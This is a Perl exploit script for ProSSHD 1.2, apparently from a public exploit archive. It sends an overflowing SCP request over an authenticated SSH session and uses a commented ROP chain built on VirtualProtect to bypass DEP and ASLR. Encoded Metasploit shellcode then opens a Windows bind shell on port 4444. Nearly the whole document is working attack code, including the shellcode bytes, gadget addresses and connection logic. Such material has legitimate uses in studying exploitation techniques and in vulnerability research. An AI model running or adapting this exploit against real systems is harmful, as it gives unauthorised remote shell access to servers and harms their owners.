# Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)# Date: 03.05.2010# Author: Alexey Sintsov# Version: 1.2# Tested on: Windows XP SP3 / Windows 7# CVE : # Code : ################################################################################# Original exploit by S2 Crew [Hungary] # * * *# ROP for DEP and ASLR bypass by Alexey Sintsov from DSecRG [www.dsecrg.com]# * * *# Tested on:ProSSHD v1.2 on Windows XP and Windows 7 with DEP for all# # Special for XAKEP magazine[www.xakep.ru]### CVE: - #!/usr/bin/perl
use Net::SSH2;$username = '';$password = '';$host = '192.168.126.129';#Remote host#$host = '192.168.13.6'; $port = 22;# windows/shell_bind_tcp - 368 bytes# http://www.metasploit.com# Encoder: x86/shikata_ga_nai# LPORT=4444, RHOST=, EXITFUNC=process, InitialAutoRunScript=, # AutoRunScript=$shell =
"\xba\xda\x29\x13\xda\xd9\xe9\xd9\x74\x24\xf4\x58\x31\xc9"."\xb1\x56\x31\x50\x13\x83\xc0\x04\x03\x50\xd5\xcb\xe6\x26"."\x01\x82\x09\xd7\xd1\xf5\x80\x32\xe0\x27\xf6\x37\x50\xf8"."\x7c\x15\x58\x73\xd0\x8e\xeb\xf1\xfd\xa1\x5c\xbf\xdb\x8c"."\x5d\x71\xe4\x43\x9d\x13\x98\x99\xf1\xf3\xa1\x51\x04\xf5"."\xe6\x8c\xe6\xa7\xbf\xdb\x54\x58\xcb\x9e\x64\x59\x1b\x95"."\xd4\x21\x1e\x6a\xa0\x9b\x21\xbb\x18\x97\x6a\x23\x13\xff"."\x4a\x52\xf0\xe3\xb7\x1d\x7d\xd7\x4c\x9c\x57\x29\xac\xae"."\x97\xe6\x93\x1e\x1a\xf6\xd4\x99\xc4\x8d\x2e\xda\x79\x96"."\xf4\xa0\xa5\x13\xe9\x03\x2e\x83\xc9\xb2\xe3\x52\x99\xb9"."\x48\x10\xc5\xdd\x4f\xf5\x7d\xd9\xc4\xf8\x51\x6b\x9e\xde"."\x75\x37\x45\x7e\x2f\x9d\x28\x7f\x2f\x79\x95\x25\x3b\x68"."\xc2\x5c\x66\xe5\x27\x53\x99\xf5\x2f\xe4\xea\xc7\xf0\x5e"."\x65\x64\x79\x79\x72\x8b\x50\x3d\xec\x72\x5a\x3e\x24\xb1"."\x0e\x6e\x5e\x10\x2e\xe5\x9e\x9d\xfb\xaa\xce\x31\x53\x0b"."\xbf\xf1\x03\xe3\xd5\xfd\x7c\x13\xd6\xd7\x0b\x13\x18\x03"."\x58\xf4\x59\xb3\x4f\x58\xd7\x55\x05\x70\xb1\xce\xb1\xb2"."\xe6\xc6\x26\xcc\xcc\x7a\xff\x5a\x58\x95\xc7\x65\x59\xb3"."\x64\xc9\xf1\x54\xfe\x01\xc6\x45\x01\x0c\x6e\x0f\x3a\xc7"."\xe4\x61\x89\x79\xf8\xab\x79\x19\x6b\x30\x79\x54\x90\xef"."\x2e\x31\x66\xe6\xba\xaf\xd1\x50\xd8\x2d\x87\x9b\x58\xea"."\x74\x25\x61\x7f\xc0\x01\x71\xb9\xc9\x0d\x25\x15\x9c\xdb"."\x93\xd3\x76\xaa\x4d\x8a\x25\x64\x19\x4b\x06\xb7\x5f\x54"."\x43\x41\xbf\xe5\x3a\x14\xc0\xca\xaa\x90\xb9\x36\x4b\x5e"."\x10\xf3\x7b\x15\x38\x52\x14\xf0\xa9\xe6\x79\x03\x04\x24"."\x84\x80\xac\xd5\x73\x98\xc5\xd0\x38\x1e\x36\xa9\x51\xcb"."\x38\x1e\x51\xde";$fuzz = "\x41"x491 .# buffer before RET addr rewriting############################### ROP # All ROP instructions from non ASLR modules (coming with ProSHHD distrib): MSVCR71.DLL and MFC71.DLL # For DEP bypass used VirtualProtect call from non ASLR DLL - 0x7C3528DD (MSVCR71.DLL)# this make stack executable:#### RET rewrite###"\x9F\x07\x37\x7C".# MOV EAX, EDI / POP EDI / POP ESI / RETN ; EAX points on our stack data with some offset"\x11\x11\x11\x11".# JUNK---------------^^^ ^^^"\x22\x22\x22\x22".# JUNK-------------------------^^^ "\x27\x34\x34\x7C".# MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10"\x33\x33\x33\x33".# JUNK------------------------------^^^ "\xC1\x4C\x34\x7C".# POP EAX/ RETN# ^^^ "\x33\x33\x33\x33".# ^^^"\x33\x33\x33\x33".# ^^^"\x33\x33\x33\x33".# ^^^"\x33\x33\x33\x33".# ^^^# ^^^"\xC0\xFF\xFF\xFF".# ----^^^Param for next instruction..."\x05\x1e\x35\x7C".# NEG EAX /RETN ; EAX will be 0x40 (param for VirtualProtect)"\xc8\x03\x35\x7C".# MOV DS:[ECX], EAX / RETN; save 0x40 (3 param)"\x40\xa0\x35\x7C".# MOV EAX, ECX / RETN ; restore pointer in EAX "\xA1\x1D\x34\x7C".# DEC EAX/ RETN ; Change position"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN ; EAX=ECX-0x0c"\x08\x94\x16\x7C".# MOV DS:[EAX+0x4], EAX / RETN ;save addres for VirtualProtect (1 param)"\xB9\x1F\x34\x7C".# INC EAX / RETN ; oh ... and move pointer back"\xB9\x1F\x34\x7C".# INC EAX / RETN"\xB9\x1F\x34\x7C".# INC EAX / RETN"\xB9\x1F\x34\x7C".# INC EAX / RETN ; EAX=ECX=0x8"\xB2\x01\x15\x7C".# MOV [EAX+0x4], 1 ; size for VirtualProtect (2 param)"\xA1\x1D\x34\x7C".# DEC EAX/ RETN ; Change position for output from VirtualProtect"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\xA1\x1D\x34\x7C".# DEC EAX/ RETN"\x27\x34\x34\x7C".# MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10"\x33\x33\x33\x33".# JUNK------------------------------^^^ "\x40\xa0\x35\x7C".# MOV EAX, ECX / RETN ; restore pointer in EAX #"\x33\x33\x33\x33".# "\x33\x33\x33\x33".# "\x33\x33\x33\x33".# "\x33\x33\x33\x33".# "\xB9\x1F\x34\x7C".# INC EAX / RETN ; and again... "\xB9\x1F\x34\x7C".# INC EAX / RETN"\xB9\x1F\x34\x7C".# INC EAX / RETN"\xB9\x1F\x34\x7C".# INC EAX / RETN"\xE5\x6B\x36\x7C".# MOV DS:[EAX+0x14], ECX ; save output addr for VirtualProtect (4 param)"\xBA\x1F\x34\x7C"x204 .# RETN fill....."\xDD\x28\x35\x7C".# CALL VirtualProtect / LEA ESP, [EBP-58] / POP EDI / ESI / EBX / RETN;Call VirtualProtect "AAAABBBBCCCCDDDD".# Here is place for params (VirtualProtect) ####################### retrun into stack after VirtualProtect"\x1A\xF2\x35\x7C".# ADD ESP, 0xC / RETN; take next ret "XXXYYYZZZ123".# trash"\x30\x5C\x34\x7C".# 0x7c345c2e: ANDPS XMM0, XMM3-- (+0x2 to address and....)--> PUSH ESP / RETN ; EIP=ESP"\x90"x14 .# NOPs here is the begining of shellcode$shell;# shellcode 8)$ssh2 = Net::SSH2->new();$ssh2->connect($host,$port)|| die "\nError: Connection Refused!\n";$ssh2->auth_password($username,$password)|| die "\nError: Username/Password Denied!\n";#sleep(10);$scpget = $ssh2->scp_get($fuzz);$ssh2->disconnect();
